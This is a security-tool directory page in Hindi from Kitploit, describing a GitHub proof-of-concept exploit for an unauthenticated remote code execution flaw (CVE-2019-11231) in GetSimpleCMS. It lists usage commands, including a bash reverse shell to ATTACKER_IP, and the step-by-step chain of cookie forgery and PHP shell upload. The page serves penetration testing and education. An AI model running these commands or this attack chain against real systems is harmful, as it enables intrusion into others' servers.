Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
उपकरण/GitHubGitHub/akincibor/cve-2019-11231-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GetSimpleCMS CVE-2019-11231 RCE शोषण

Python CVE

GetSimpleCMS ≤ 3.3.15 के लिए अप्रमाणित दूरस्थ कोड निष्पादन शोषण

भेद्यता

GetSimpleCMS संवेदनशील फ़ाइलों को सार्वजनिक रूप से उजागर करता है (/data/other/authorization.xml, /data/users/) जिससे हमलावर:

  1. API कुंजियाँ और उपयोगकर्ता नाम लीक कर सकते हैं
  2. प्रमाणीकरण कुकीज़ बना सकते हैं
  3. CSRF टोकन प्राप्त कर सकते हैं
  4. मनमाना PHP कोड अपलोड और निष्पादित कर सकते हैं

CVSS स्कोर: 9.8 (गंभीर)

उपयोग

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

यह कैसे काम करता है

टूल डाउनलोड करें
  1. संस्करण पता करें → GET /admin/
  2. सॉल्ट लीक करें → GET /data/other/authorization.xml
  3. उपयोगकर्ता नाम प्राप्त करें → GET /data/users/
  4. कुकी बनाएं → SHA1(उपयोगकर्ता नाम + सॉल्ट)
  5. नॉन्स प्राप्त करें → GET /admin/theme-edit.php
  6. शेल अपलोड करें → POST /admin/theme-edit.php
  7. कमांड निष्पादित करें → GET /theme/shell.php?cmd=...

फ़ाइलें

  • exploit.py - मुख्य शोषण स्क्रिप्ट
  • requirements.txt - निर्भरताएँ (requests, beautifulsoup4)

अस्वीकरण

⚠️ केवल शैक्षिक उद्देश्य। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति है।

संदर्भ

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231